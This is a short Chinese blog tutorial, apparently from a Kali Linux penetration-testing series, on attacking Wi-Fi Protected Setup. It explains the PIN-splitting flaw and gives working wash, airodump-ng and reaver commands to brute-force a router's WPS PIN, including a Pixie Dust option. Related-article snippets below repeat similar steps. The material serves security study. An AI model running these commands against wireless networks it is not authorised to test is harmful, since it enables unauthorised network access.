Kali linux 渗透测试(五)——渗透WPS攻击

最新推荐文章于 2023-05-11 08:00:00 发布
最新推荐文章于 2023-05-11 08:00:00 发布
阅读量1k 收藏 7
点赞数
分类专栏: kali 文章标签: 安全 kali 无线渗透 wps
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bulldozer_GD/article/details/106275342
版权

WPS(wireless protected setup)
wifi联盟2006年开发的技术,路由器和网卡各按一个键就能接入无线,PIN码分为前后两段各4位
1、安全漏洞
2011年发现接入发起方可以根据路由器的返回信息判断前四位是否正确
后四位穷举,最后一位是校验位,只要1000次尝试
PSK: 218,340,105,584,896总共11000次尝试可以破解PIN码,得到无线密码
不过现在很多厂家实现了锁定机制一分钟只能尝试有限次数,但是一般一天左右能够破解

wash -i wlan0mon -c 11#启动侦听,发现支持WPSAP-c指定信道11
airodump-ng wlan0mon --wps #抓包
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11#爆破PIN码,-b指定APMAC-vv说明详细显示信息
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -K 1 #针对有漏洞的,妙破,可以先尝试
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -p 88888888 #-p指定PIN

3.实验

在这里插入图片描述

在这里插入图片描述
WPS安全性很低
破解很快偏偏好些路由器自带

Bulldozer++
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali学习 | 无线渗透:7.4 攻击WPS(Wi-Fi Proteced Setup)
qq_43233085的博客
01-28 3017
Kali学习 | 无线渗透:7.4 攻击WPS(Wi-Fi Proteced Setup)WPS 介绍使用Reaver破解WPS使用Wifite攻击WPS WPS 介绍 WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准。 该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病。 因为通常用户往往会因为设置步骤太麻烦,以至于不做任何加密安全设定,从而引起许多安全上的问题。 所以很...
无线渗透_WPS攻击
分享学习网络的点点滴滴
07-07 491
WPSWIFI联盟2006年开发的一项技术通过PIN码来简化无线接入的操作,无需记住PSK路由器和网卡各按一个按钮就能接入无线PIN码是分为前后各4位的2段共8位数字安全漏洞PSK:218,340,105,854,8962011年被发现安全涉及漏洞接入发起方可以根据路由器的返回信息判断前4位是否正确而PIN码的后4位只有1000种定义的组合(最后一位是checksum)所以全部穷举破解只需要11000次尝试标准本身没有设计锁定机制,目前多个厂商已实现锁定机制包括Linksys在内的很多厂家的无线路由器无法
WPS 攻击渗透-学习笔记
winux123的博客
11-26 747
1、启用监听模式(Monitor Mode),发现支持WPS的AP 如果进入监听模式请查阅前两章有关WPA WEP攻击的文章 wash -C -i wlan0mon#-C 忽略错误帧 -i 指定网卡 airodup-ng wlan0mon --wps 2、爆破PIN码 reaver -i wlan0mon -b <AP mac> -vv #-vv 显示详细的信息 3、在得...
Kali Linux学习笔记—无线网络 WPS 攻击
weixin_43653897的博客
12-02 1318
WPS攻击 WPS WIRELESS PROTECTED SETUP WPSWiFi联盟开发的一项目的是既保证安全又简化接入的技术。 通过PIN码来简化无线接入的操作,无需记住PSK 路由器和网卡各按一个按钮就能接入无线 PIN码是分为前后各4位的2段共8位数字 安全漏洞 接入方可以根据路由器的返回信息判断前4位是否正确 PIN码后4位只有1000种定义的组合 所以全部穷举破解只需要11000次尝试 步骤: 启动侦听模式,发现支持WPS的AP wash -F -i wlan0mon airo
Kali-linux攻击WordPress和其他应用程序
2301_77162959的博客
05-11 1543
今天越来越多的企业利用SAAS(Software as a Service)工具应用在他们的业务中。例如,他们经常使用WordPress作为他们网站的内容管理系统,或者在局域网中使用Drupal框架。从这些应用程序中找到漏洞,是非常有价值的。为了收集用于测试的应用程序,Turnkey Linux是一个非常好的资源。Turnkey工具的官方网站是Turnkey Linux发行版。
Kali Linux渗透测试技术详解
最新发布
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击无线网络攻击、...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
基于Kali Linux渗透测试.pdf
09-06
基于Kali Linux渗透测试.pdf 本文档总结了基于Kali Linux渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面。 1. 渗透测试的概念 渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意...
KaliLinux渗透测试步曲
03-23
TechTarget中国原创】KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管...
无线网络WPS攻击
游客
04-29 5207
无线WPS攻击(测试未成功) 提前准备: 注意:顺序最好不要乱了顺序。 1.service network-manager stop 2. airmon-ng check kill 3.连接外置网卡 4.airmon-ng start wlan0 (把网卡变为监听模式,输入ifconfig可看到wlan0已变成wlan0mon) 正式步骤: 1.利用wash扫描附近开启WPS的网络:wash -...
reaver-wps, 针对 Wifi protected 设置的强力攻击.zip
10-10
reaver-wps, 针对 Wifi protected 设置的强力攻击 带MAC的 REAVER WPSREAVER WPS修改版本,带有MAC地址上一个字符转换器,以加速攻击。好吧,有些时候AP会在成功的pin尝试后拒绝"eapol请求"。 我对同时运行的reaver ( 。-m参数) 实例进行了一些测试
kali字典_kali黑客系统wpscan工具扫描wordpress漏洞入侵攻击测试教程
weixin_39976166的博客
12-03 900
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的...
攻击Wordpress应用程序(使用WPSCAN)
csu_vc的博客
07-18 1250
第一步——获取WordPress应用程序怎么获取WordPress的具体操作在这里不仔细叙述,网上百度就有第二部——安装WordPress Turnkey Linux下载好ISO文件之后进行安装WordPress Turnkey Linux的安装 这里也不仔细叙述,比较简单第三步——安装完毕并设置好可以看到WordPress应用服务的详细信息,如Web地址、Web shell地址等,如图 第四步
kali linux wps 2019 删除_Linux日志分析
weixin_39728320的博客
10-24 366
0x00 前言Linux系统拥有非常灵活和强大的日志功能,可以保存几乎所有的操作记录,并可以从中检索出我们需要的信息。 本文简介一下Linux系统日志及日志分析技巧。0x01 日志简介日志默认存放位置:/var/log/查看日志配置情况:more /etc/rsyslog.conf比较重要的几个日志: 登录失败记录:/var/log/btmp //lastb 最后一次登录:/var/log...
Kali Linux 2020.02 安装 WPS
king丶
06-29 3690
Kali Linux 2020.02 安装 WPS 很简单的一条命令,搞定。 https://www.wps.cn/product/wpslinux 下载完毕之后。 在下载目录打开命令框 执行 sudo dpkg -i wps-office_11.1.0.9522_amd64.deb 看图。完事 ...
Kali Linux 无线渗透测试入门指南 第十章 WPS 和 探针
热门推荐
龙哥盟
10-27 4万+
第十章 WPS 和 探针 作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙 协议:CC BY-NC-SA 4.0 太阳底下无新事。 – 谚语 这一章由新的技巧组成,包括攻击 WPS 和探针监控,也包含了使无线测试更简单的 pineapple 工具。这些攻击和工具在本书第一版的发布过程中出现,我们要确保这本书尽可能全
无线渗透(中)--WPS破解
hl1293348082的专栏
04-07 5448
0x00. 前言 基于第一篇文章WPA密码破解的反馈,有人提问说能否写一下关于WPA2的文章。笔者在这里回答一下,破解WPA2的流程和WPA是一样的,WPA2只是采用了更加复杂可靠的加密算法(利用CCMP替代了TKIP,AES替代了RC4),不过依然可以利用上一篇文章中提到的攻击原理来暴力破解PSK,所以笔者不会再写WPA2的内容。另外,由于某些缘故WEP密码破解可能不会写了,大家见谅,不过其他内容依然会陆续推出。 0x01. WPS简介 WPS是由Wi-Fi联盟组织实施的认证项目,主要致力于简化无线
攻击WPS样本”实为敲诈者
weixin_34183910的博客
09-01 224
一、 概述 4月30日,安天接到用户提供的恶意邮件附件,据该用户称已将该附件提交至第三方开放沙箱,并怀疑其专门攻击wps办公系统及窃取信息。由于该样本可能与国产办公软件环境相关,引发了部分用户的关注,希望安天能尽快给予帮助确认,经过安天CERT分析确认,该样本确实是恶意代码,但并对WPS办公环境并无针对性。经安天CERT分析确认该样本为CTB-Locke...
Kali linux 学习笔记(三十无线渗透——WPS攻击 2020.3.13
闵行小鱼塘
03-13 1251
本节学习对WPS攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bulldozer++

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值